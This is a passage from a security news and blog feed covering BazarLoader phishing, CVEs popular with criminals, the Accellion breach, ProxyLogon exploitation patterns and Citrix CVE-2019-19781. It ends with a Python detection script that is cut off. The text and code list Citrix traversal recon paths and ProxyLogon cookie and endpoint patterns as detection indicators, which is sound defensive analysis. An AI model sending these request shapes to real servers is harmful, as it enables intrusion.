BazarLoader was first observed in the wild last April \u2013 and since then researchers have observed at least six variants, \u201csignaling active and continued development.\u201d\n\nIt\u2019s been recently seen being used as a staging malware for ransomware, [particularly Ryuk](<https://threatpost.com/ransomware-french-it-giant/160484/>).\n\n\u201cWith a focus on targets in large enterprises, BazarLoader could potentially be used to mount a subsequent ransomware attack,\u201d according to an advisory from Sophos, [issued on Thursday](<https://news.sophos.com/en-us/2021/04/15/bazarloader/>).\n\n## **Cyberattackers Abuse Slack and BaseCamp **\n\nAccording to researchers at Sophos, in the first campaign spotted, adversaries are targeting employees of large organizations with emails that purport to offer important information related to contracts, customer service, invoices or payroll.\n\n\u201cOne spam sample even attempted to disguise itself as a notification that the employee had been laid off from their job,\u201d according to Sophos.\n\nThe links inside the emails are hosted on Slack or BaseCamp cloud storage, meaning that they could appear to be legitimate if a target works at an organization that uses one of those platforms. In an [era of remote working](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>), those odds are good that this is the case.\n\n\u201cThe attackers prominently displayed the URL pointing to one of these well-known legitimate websites in the body of the document, lending it a veneer of credibility,\u201d researchers said. \u201cThe URL might then be further obfuscated through the use of a URL shortening service, to make it less obvious the link points to a file with an .EXE extension.\u201d\n\nIf a target clicks on the link, BazarLoader downloads and executes on the victim\u2019s machine. The links typically point directly to a digitally signed executable with an Adobe PDF graphic as its icon. 
The files usually perpetuate the ruse, with names like presentation-document.exe, preview-document-[number].exe or annualreport.exe, researchers noted.\n\nThese executable files, when run, inject a DLL payload into a legitimate process, such as the Windows command shell, cmd.exe.\n\n\u201cThe malware, only running in memory, cannot be detected by an endpoint protection tool\u2019s scans of the filesystem, as it never gets written to the filesystem,\u201d explained researchers. \u201cThe files themselves don\u2019t even use a legitimate .DLL file suffix because Windows doesn\u2019t seem to care that they have one; The OS runs the files regardless.\u201d\n\n## **\u2018BazarCall\u2019 Campaign**\n\nIn the second campaign, Sophos found that the spam messages are devoid of anything suspicious: There\u2019s no personal information of any kind included in the body of the email, no link and no file attachment.\n\n\u201cAll the message claims is that a free trial for an online service the recipient purportedly is currently using will expire in the following day or two, and embeds a telephone number the recipient needs to call in order to opt-out of an expensive, paid renewal,\u201d researchers explained.\n\nIf a target decides to pick up the phone, a friendly person on the other side gives them a website address where the soon-to-be-victim could supposedly unsubscribe from the service.\n\n\u201cThe well-designed and professional looking websites bury an unsubscribe button in a page of frequently asked questions,\u201d according to Sophos. \u201cClicking that button delivers a malicious Office document (either a Word doc or an Excel spreadsheet) that, when opened, infects the computer with the same BazarLoader malware.\u201d\n\nThe messages initially claimed to originate from a company called Medical Reminder Service, and include a telephone number in the message body, as well as a street address for a real office building located in Los Angeles. 
But in mid-April, the messages adopted a lure involving a fake paid online lending library, called BookPoint.\n\nThe subject lines revolving around BookPoint also reference a long number or code, which users are asked to input in order to \u201cunsubscribe.\u201d\n\nIn terms of the infection routine, the attackers in these so-called \u201cBazarCall\u201d campaigns deliver weaponized Microsoft Office documents that invoke commands to drop and execute one or more payload DLLs.\n\n## **Connection to Trickbot?**\n\nResearchers have suspected that BazarLoader could be related to, or authored by, the TrickBot operators. TrickBot is another first-stage loader malware often used in ransomware campaigns.\n\nSophos looked into the connection and found that the two malware families use some of the same infrastructure for command and control.\n\n\u201cFrom what we could tell, the [BazarLoader] malware binaries running in the lab network bear no resemblance to TrickBot,\u201d according to the posting. \u201cBut they did communicate with an IP address that has been used in common, historically, by both malware families. Of course, a lot of people have [studied this connection in the past](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>).\u201d\n\nIn any event, BazarLoader appears to be in an early stage of development and isn\u2019t as sophisticated as more mature families like TrickBot, researchers added.\n\nFor instance, \u201cwhile early versions of the malware were not obfuscated, more recent samples appear to encrypt the strings that might reveal the malware\u2019s intended use,\u201d they said.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. 
ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T20:27:25", "type": "threatpost", "title": "BazarLoader Malware Abuses Slack, BaseCamp Clouds", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-16T20:27:25", "id": "THREATPOST:354BF51EC880C48C85D9302EDB1227D6", "href": "https://threatpost.com/bazarloader-malware-slack-basecamp/165455/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-17T07:28:30", "description": "Criminal small talk in underground forums offers critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.\n\nAn analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. 
In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.\n\n\u201cOur findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,\u201d the report said. \u201cHowever, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.\u201d[](<https://threatpost.com/newsletter-sign/>)The researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed about vulnerabilities among attackers between Jan. 2020 and March 2021.\n\n## **Six CVEs Popular with Criminals**\n\n[CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)\n\n[CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)\n\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n[CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)\n\n[CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)\n\n[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)\n\n\u201cMost of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,\u201d the report said.\n\nNotably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.\n\nThe 
report added, the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which, \u201cindicates that organizations are not patching their systems and are not maintaining a resilient security posture.\u201d\n\nMicrosoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.\n\nZeroLogon is a prime example. The [flaw in Microsoft\u2019s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. Patching ZeroLogon was so slow, Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an \u201cenforcement mode.\u201d\n\nIn March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).\n\nThe analysts explained varying CVEs were more talked about depending on the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat actor circles. 
And Turkish forums were focused on CVE-2019-6340.\n\nThe researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren\u2019t mentioned because there wasn\u2019t a clear frontrunning CVE discussed.\n", "cvss3": {}, "published": "2021-07-16T21:07:15", "type": "threatpost", "title": "Top CVEs Trending with Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2019-0708", "CVE-2019-19781", "CVE-2019-6340", "CVE-2020-0688", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2021-07-16T21:07:15", "id": "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "href": "https://threatpost.com/top-cves-trending-with-cybercriminals/167889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2021-03-09T20:27:10", "description": "At the end of last year, enterprise firewall company Accellion was the victim of a two-phase [SQL injection attack](<https://www.imperva.com/learn/application-security/sql-injection-sqli/>) that resulted in significant sensitive data breaches over the last number of months. This attack is important for several reasons. It underscores the [rise in frequency](<https://www.identityforce.com/blog/2020-data-breaches>) of incidents leading to public breaches, and highlights SQL injections as an increasingly popular way for attackers to cause major damage. Imperva Research Labs are consistently seeing SQL injection as a [preferred attack](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) method. 
More importantly (and frankly, what should scare the pants off everyone), the analysis of this breach confirms that attackers and their methods are becoming more creative and sophisticated. To stop them, organizations need to put greater effort into analyzing and monitoring the data layer. When organizations combine data-centric threat mitigation with protecting all paths to their data, they have a far better posture to stop sophisticated breaches like this in their tracks.\n\n### Learning from the timeline of events\n\nLet\u2019s take a closer look at the details of this attack and explain why understanding how it happened is critical to stopping similar attacks in the future.\n\nIn December 2020, attackers exploited zero-day vulnerabilities in enterprise content firewall company Accellion\u2019s File Transfer Appliance (FTA) to steal customer data, credit information and personal data such as birthdates and email addresses, which were subsequently used as leverage in ongoing extortion attempts.\n\nA post-breach analysis of the attack revealed that the attacker(s) chained together the following vulnerabilities in their content firewall: SQL Injection (CVE-2021-27101) and OS Command Execution (CVE-2021-27104). The attacker leveraged the SQL Injection vulnerability against the file document_root.html to retrieve \u201cW\u201d keys from the Accellion FTA database. Accellion issued a patch to mitigate the vulnerabilities less than 72 hours after discovery.\n\nAfter the December 20, 2020 release of Accellion\u2019s patch, which remediated the vulnerabilities associated with the December exploit, the attacker changed their entry point and employed a new technique involving Server-Side Request Forgery (SSRF) (CVE-2021-27103) and OS Command Execution (CVE-2021-27102). 
The attacker\u2019s strategy was clear: a two-phase approach, the first phase targeting vulnerabilities in the content firewall and the second targeting the database where the customer data was held.\n\n### Attack techniques used in the Accellion breach are likely to continue\n\nToday\u2019s cyber attacks are becoming ever more creative, sophisticated and well-funded, in many cases by nation states. As a result, the attackers now have the resources to learn how the software of a target organization works. They have the resources to stay abreast of trends and vulnerabilities, increasing their capacity to make more sophisticated attacks. To get the highest return on their investment, attackers and their sponsors choose organizations whose applications and appliances are widely used and trusted by thousands of customers, like Accellion\u2019s FTA.\n\nAs in the 2020 [SolarWinds breach](<https://www.imperva.com/blog/2020-ends-with-a-bang/>), the attackers didn\u2019t just exploit vulnerabilities to compromise a target system; they were knowledgeable enough to run a clean-up routine to erase evidence of the activity. In the Accellion case, the attackers took the time to reverse-engineer their target\u2019s software and figure out the best way to breach their content firewall. When Accellion shut down that path, they already had a plan to attack the database itself. Attacking a company like Accellion that facilitates secure file transfers is particularly brazen. Irony notwithstanding, it makes sense. Accellion enterprise customers using secure file transfers are very likely to be moving around the exact data that an attacker wants to steal. 
In the end, the attackers were also able to weaponize the data and use it for global extortion attempts that are [likely to continue](<https://www.wired.com/story/accellion-breach-victims-extortion/>) for many months.\n\n### An optimal data security posture thwarts these new breeds of attacks\n\nThe Accellion breach started with a SQL injection attack. Just using SQL injection, the attackers managed to complete a successful attack. This illustrates very clearly the absolute need to do analytics and threat detection at the data layer. The lowest common denominator in all applications is the data repository layer - all apps and all systems store data somewhere. Most applications use a database although in today\u2019s modern architecture landscape many things can and should be classified as a database even if technically they are not a DBMS. At the end of the day, you can discover almost any attack just by looking at the data layer because every application has a data component.\n\nGoing back to the [Imperva Research Lab\u2019s data](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) and seeing the chronic and persistent frequency with which SQL injection results in attacks, it seems that organizations still are not paying enough attention to securing the data layer. In the SolarWinds case, as well as this Accellion breach, monitoring at the data level with machine learning model-driven [behavior analytics](<https://www.imperva.com/learn/data-security/ueba-user-and-entity-behavior-analytics/>) and [automated detection](<https://www.imperva.com/products/data-risk-analytics/>) of non-compliant, risky, or malicious data access behavior would have brought up-front attention to these attacks.\n\nThe other thing we learn from the Accellion breach is that one must protect all paths to the data. When the content firewall protection fails, you must have internal protection in place to stop attacks. 
In the Accellion case, they only fixed a part of the problem after the first breach. They mitigated the first vulnerability - but most of the attack itself stayed the same when the attacker launched the second phase of the breach. The attackers changed only the entry point until they gained the ability to run an OS command. From there, the rest of the attack followed the pattern of the first, they only had to find a different first step. This highlights the critical importance for organizations to secure all access points as a matter of course. Imperva is dedicated not only to securing data, but securing all paths to the data. Imperva helps organizations take a holistic approach to security and execute both application monitoring and database monitoring.\n\nThe post [Protecting Your Data from Cyber Extortion: Lessons from the Latest Mega-hack](<https://www.imperva.com/blog/the-latest-multistage-attacks-demonstrate-the-need-to-secure-the-data-layer/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T19:39:36", "type": "impervablog", "title": "Protecting Your Data from Cyber Extortion: Lessons from the Latest Mega-hack", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-03-09T19:39:36", "id": "IMPERVABLOG:9DE0CE48F84BCF9764A6FA0372DB2AD1", "href": "https://www.imperva.com/blog/the-latest-multistage-attacks-demonstrate-the-need-to-secure-the-data-layer/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-29T14:27:27", "description": "### Introduction\n\nOn 2 March 2021, [Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and [Volexity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) produced disclosures outlining the discovery of four zero-day vulnerabilities affecting multiple versions of Microsoft Exchange Server. Each of the vulnerabilities has been given a severity rating from high to critical; however, the most impactful statement from both Microsoft and Volexity was that these vulnerabilities formed an attack chain which was being actively exploited in the wild.\n\nSince the publication of these disclosures, details have emerged regarding the observed source of the exploitation of these vulnerabilities. The attacks are being widely attributed to the state-sponsored group dubbed Hafnium, [alleged](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) to be operating out of China.\n\nThe most notable of the new CVEs, [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), is an SSRF vulnerability in Microsoft Exchange which allows an attacker to induce the server into performing \u201cunintended actions\u201d through the use of a series of specially crafted POST requests. 
The attacker can leverage this vulnerability to exploit the other CVEs to perform malicious actions, such as dump private email, or even achieve remote code execution.\n\nImperva has put dedicated security rules in place to protect our customers in a direct response to the initial disclosures. Imperva has also performed analysis on the attempted exploitation of these CVEs and we have produced the following insights.\n\n### Observations and Statistics\n\nSince the 2 March disclosures, Imperva has observed over **44k** scanning and exploitation attempt sessions in the wild from over **1,600** unique source IPs, related to the Microsoft Exchange [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) SSRF. From this data, we have been able to identify the most targeted industries and countries which have been affected by the vulnerability in the aftermath of the disclosures.\n\n### Targeted Industries\n\nOne of the key observations we have made is that this vulnerability has impacted almost every category of industry, this observation is explained by how ubiquitous the use of Microsoft Exchange is across all sectors. According to our data, the Computing & IT sector was the most targeted industry, with 21% of all targeted sites belonging to this category. Next was Financial Services with 18%, and Telecoms and ISPs completed the top 3 with 10.5%. Below we show the breakdown of scanning and exploitation attempts against various industries.\n\n### Targeted Countries\n\nImperva observed both scanning and exploitation attempts against sites worldwide, with the US being the most targeted country, with the UK and Singapore a distant second and third, respectively.\n\n### Source Countries\n\nImperva observed that since the disclosures, relatively few scanning and exploitation attempts have been made from Chinese sources. This could be because exploitation, and to a greater extent, scanning has shifted to the wider public. 
It may also be because the attackers are using proxies to carry out the attacks. The chart below shows the top attacking countries by session count observed by Imperva analysts since the disclosures.\n\n### Attacker IP Reputation\n\nImperva\u2019s IP reputation allows for the identification of potentially suspicious or malicious behaviour by means of tagging relevant IPs. From this data, **42.3%** of the attacker source IPs were previously tagged by Imperva as having exhibited malicious behaviour and **8.45%** of the attacker source IPs were previously tagged by Imperva as being identified as vulnerability scanners.\n\n### Observed Attacker Activity\n\nImperva analysts have observed various indicators of the attempted exploitation of the Microsoft Exchange Hafnium [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) in the wild, indicating various motives on the part of the attackers. As mentioned previously, an attacker can leverage the vulnerability to perform various unauthorized actions, including the collection of private information, and even the writing of arbitrary files to the server resulting in remote code execution. 
In this section, we will discuss some of the requests we have observed and the perceived intentions and motivation of the attackers.\n\nDetailed descriptions of how the exploit chain works, and how it can be exploited, are available from several sources [[1](<https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265>)][[2](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>)]; however, the important thing to understand is that the vulnerability allows an attacker to send malicious requests to various backend components in Microsoft Exchange by means of a specially crafted POST request to either the Outlook Web Application or the Exchange Admin Centre, where the \u201cX-BEResource\u201d and \u201cX-AnonResource-Backend\u201d cookie values can be manipulated to specify the targeted resource. In our investigation following the disclosures we have observed the following in our data.\n\n### Crafted requests to /EWS/Exchange.asmx\n\nA common exploit request observed by Imperva attempting to exploit the CVE-2021-26855 SSRF vulnerability was a POST request to the Exchange Admin Centre (/ecp/) or Outlook Web Application (/owa/) endpoints, with the crafted cookie value set to the Exchange Web Services endpoint \u201c/EWS/Exchange.asmx\u201d. This allows the attacker to gain authenticated access to private mail on the server. 
This request accounted for **18%** of exploitation attempts observed.\n\n### Crafted requests to /autodiscover/autodiscover.xml\n\nThe most common exploitation attempt of the SSRF observed by Imperva analysts was a request to the Exchange Admin Centre endpoint (/ecp), with the vulnerable cookie set to the FQDN of the server and the endpoint /autodiscover/autodiscover.xml.\n\nAutodiscover in Exchange is a service which allows for the rapid collection of Exchange configurations, service URLs and supported protocols; it therefore makes an obvious target for attackers who are attempting to quickly gather information, escalate privileges and maintain persistence. In the case of this vulnerability the autodiscover service could be used to gather the information required for further exploitation of the other CVEs associated with the chain. This request accounted for **51%** of exploitation attempts observed.\n\n### Crafted requests to /mapi/emsmdb\n\nAnother pattern Imperva analysts observed was crafted POST requests to the Exchange Admin Centre (/ecp), with the cookie value crafted with the **/mapi/emsmdb** endpoint.\n\nResearch into the published exploits and disclosures indicates that the \u201c/mapi/emsmdb\u201d endpoint can be abused to procure a valid SID, which can then allow the attacker to gain privileges to the Exchange \u201c**proxyLogin.ecp**\u201d endpoint (Exchange HTTP proxy), which can in turn be used to obtain valid \u201c**ASP.NET_SessionID**\u201d and \u201c**msExchEcpCanary**\u201d values which are required for further chained exploitation of MS Exchange. This request accounted for **3%** of exploitation attempts observed.\n\n### How Imperva protects you\n\nImperva has implemented rules in [Cloud WAF](<https://www.imperva.com/products/web-application-firewall-waf/>) and [On Prem WAF](<https://www.imperva.com/products/web-application-firewall-waf/>), which are effective against all exploitation of CVE-2021-26855. 
These rules are also effective against the chained exploitation of the subsequent CVEs: [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>).\n\n### Check if you have been compromised\n\nSince the disclosures of these zero day vulnerabilities, various news articles have been published reporting mass exploitation [[1](<https://www.bbc.com/news/technology-56372188>)][[2](<https://www.zdnet.com/article/microsoft-exchange-server-zero-day-attacks-malicious-software-found-on-2300-machines-in-uk/>)]. We recommend that if you have unpatched exchange servers in your organization, you apply the latest patches from Microsoft as soon as possible, and use the following [guide](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) from Microsoft to check for any indicators of compromise.\n\nThe post [Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures](<https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T15:06:38", "type": "impervablog", "title": "Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-26T15:06:38", "id": "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "href": "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-19T15:26:21", "description": "On December 17, Citrix issued a [Security Bulletin](<https://support.citrix.com/article/CTX267027>) on an unauthenticated remote code execution vulnerability (CVE-2019-19781) affecting its Citrix Application Delivery Controller (ADC) - formerly known as NetScaler ADC - and its Citrix Gateway - formerly known as NetScaler Gateway.\n\nAt the time of the security bulletin release, there was no official information available on what the exact vulnerability was, although Citrix did [release Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) which shed some light on how the vulnerability was exploited. \nThe mitigation offered was to create a responder policy that would prevent HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL which would trigger a 403 response code.\n\nAt that point it was assumed the vulnerability would most likely take advantage of some sort of directory traversal flaw to upload malicious files to the /vpns/ path, leading to remote code execution. 
We created several research rules to detect HTTP requests to the suspicious path, but weren\u2019t able to capture any kind of malicious requests at that time.\n\nOn January 3, the [SANS Internet Storm Center (ISC) tweeted](<https://twitter.com/sans_isc/status/1213228049011007489>) that they\u2019d observed the \u201cfirst exploit attempt\u201d for this vulnerability in the wild, although they didn\u2019t include any additional details. At that point in time, no malicious requests were detected on any sites protected by Imperva.\n\nFrom January 7 onwards, several blog posts were published that gradually started to reveal the nature of the attack, until a POC and exploit was published on January 10.\n\nYou can read an in depth analysis of the vulnerability [here](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>) and [here](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>).\n\nAs attack activity rose immediately following the release of the POC/exploits, we found that the first stage of the attack was blocked out-of-the-box using existing directory traversal signatures - thus Imperva provided a mitigation for a zero day exploit.\n\nIn addition, the research rules that were set up prior to the POC/exploits both detected and blocked the second stage of the attack. 
What\u2019s more, they were able to block recon attempts by attackers trying to detect vulnerable Citrix ADC/GW by directly accessing the following paths, in an effort to retrieve the \u2018smb.conf\u2019 configuration file or reach the writeable script \u2018newbm.pl\u2019:\n\n * /vpns/\n * /vpn/../vpns/cfg/smb.conf\n * /vpn/../vpns/portal/scripts/newbm.pl\n\nFrom that point onwards we saw a surge in attack attempts on sites protected by Imperva, as shown in the graphs below:\n\nAfter the two initial exploits were published - a simple Bash script and a more detailed Python script - numerous other variations of the exploit appeared in several GitHub repositories. Below we can see the spread of various clients that were identified based on client verification tests, as sources of exploitation and scanning attempts on Imperva-protected sites:\n\nFrom the graph above we can see that, from January 11 onwards, most exploit attempts were executed using the Bash script - this was identified by the cURL User-Agent, as the script uses cURL to send the malicious request - followed by the Python scripts (there were two variations of the exploit, one using the Python urllib library, the other using the python-requests library).\n\nIn the last 24 hours (at the time of writing this post) we also noticed a sudden increase in requests from various vulnerability scanners, mainly WhiteHat Vulnerability Scanner.\n\nBelow you can see the number of Imperva-protected sites targeted since the exploit attempts were detected in the wild, and the total number of sites attacked: \n\n\nAt the end of the day, our customers were protected right out-of-the-box in the Cloud and the On-prem WAF. 
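The request-level detection the two Imperva posts above describe, as an added example that is not Imperva's code: it classifies request records for the CVE-2021-26855 cookie SSRF (a POST to /ecp/ or /owa/ carrying an X-BEResource or X-AnonResource-Backend cookie that names a backend path) and for CVE-2019-19781 probes (/vpns/ reached through a /../ hop, including the three recon paths listed above). The cookie value layout (host/path~version), the classification labels and the sample records are assumptions constructed for the example, not captured traffic.

```python
# Added example (not Imperva's code): classify web-server request records for the
# two exploit patterns discussed above, ProxyLogon SSRF via the X-BEResource /
# X-AnonResource-Backend cookies (CVE-2021-26855) and the Citrix ADC/Gateway
# traversal into /vpns/ (CVE-2019-19781). Cookie syntax and sample records are
# constructed from public descriptions and are assumptions, not captured traffic.
from urllib.parse import unquote

# Backend resources the Imperva post saw named in crafted cookies.
PROXYLOGON_TARGETS = {
    '/autodiscover/autodiscover.xml': 'autodiscover (recon)',
    '/ews/exchange.asmx': 'EWS (mailbox access)',
    '/mapi/emsmdb': 'MAPI (SID harvesting)',
}
# Front-end entry points the SSRF is sent through.
EXCHANGE_FRONTENDS = ('/ecp/', '/owa/')
SSRF_COOKIES = ('X-BEResource', 'X-AnonResource-Backend')


def parse_cookies(header):
    '''Split a raw Cookie header into a dict; values keep their raw text.'''
    jar = {}
    for part in header.split(';'):
        name, sep, value = part.strip().partition('=')
        if sep:
            jar[name.strip()] = value.strip()
    return jar


def classify_proxylogon(method, path, cookie_header):
    '''Return a label if the request has the CVE-2021-26855 SSRF shape, else None.

    Shape: POST to /ecp/ or /owa/ carrying an X-BEResource or X-AnonResource-Backend
    cookie whose value names a backend host and path (assumed layout host/path~version).'''
    if method != 'POST' or not path.lower().startswith(EXCHANGE_FRONTENDS):
        return None
    jar = parse_cookies(cookie_header)
    for name in SSRF_COOKIES:
        if name not in jar:
            continue
        value = unquote(jar[name])
        backend = value.split('~', 1)[0]          # drop the ~version suffix
        backend_path = '/' + backend.split('/', 1)[1] if '/' in backend else '/'
        backend_path = backend_path.split('?', 1)[0].lower()
        label = PROXYLOGON_TARGETS.get(backend_path, 'other backend')
        return 'proxylogon ssrf via %s -> %s (%s)' % (name, backend_path, label)
    return None


CITRIX_RECON_PATHS = ('/vpns/cfg/smb.conf', '/vpns/portal/scripts/newbm.pl')


def classify_citrix(path):
    '''Flag CVE-2019-19781 probes: /vpns/ reached through a /../ hop.

    Matching is done on the URL-decoded but NOT normalised path, because the attack
    relies on the appliance collapsing /vpn/../vpns/ after its access check.'''
    lowered = unquote(path).lower()
    if '/vpns/' not in lowered:
        return None
    traversal = '/../' in lowered
    for known in CITRIX_RECON_PATHS:
        if lowered.endswith(known):
            return 'citrix recon for %s (traversal=%s)' % (known.rsplit('/', 1)[1], traversal)
    return 'citrix /vpns/ access (traversal=%s)' % traversal


def classify(record):
    '''record: (method, path, cookie_header). Returns a list of labels, possibly empty.'''
    method, path, cookies = record
    hits = []
    for label in (classify_proxylogon(method, path, cookies), classify_citrix(path)):
        if label:
            hits.append(label)
    return hits


# Constructed sample records (not real traffic).
SAMPLE_RECORDS = [
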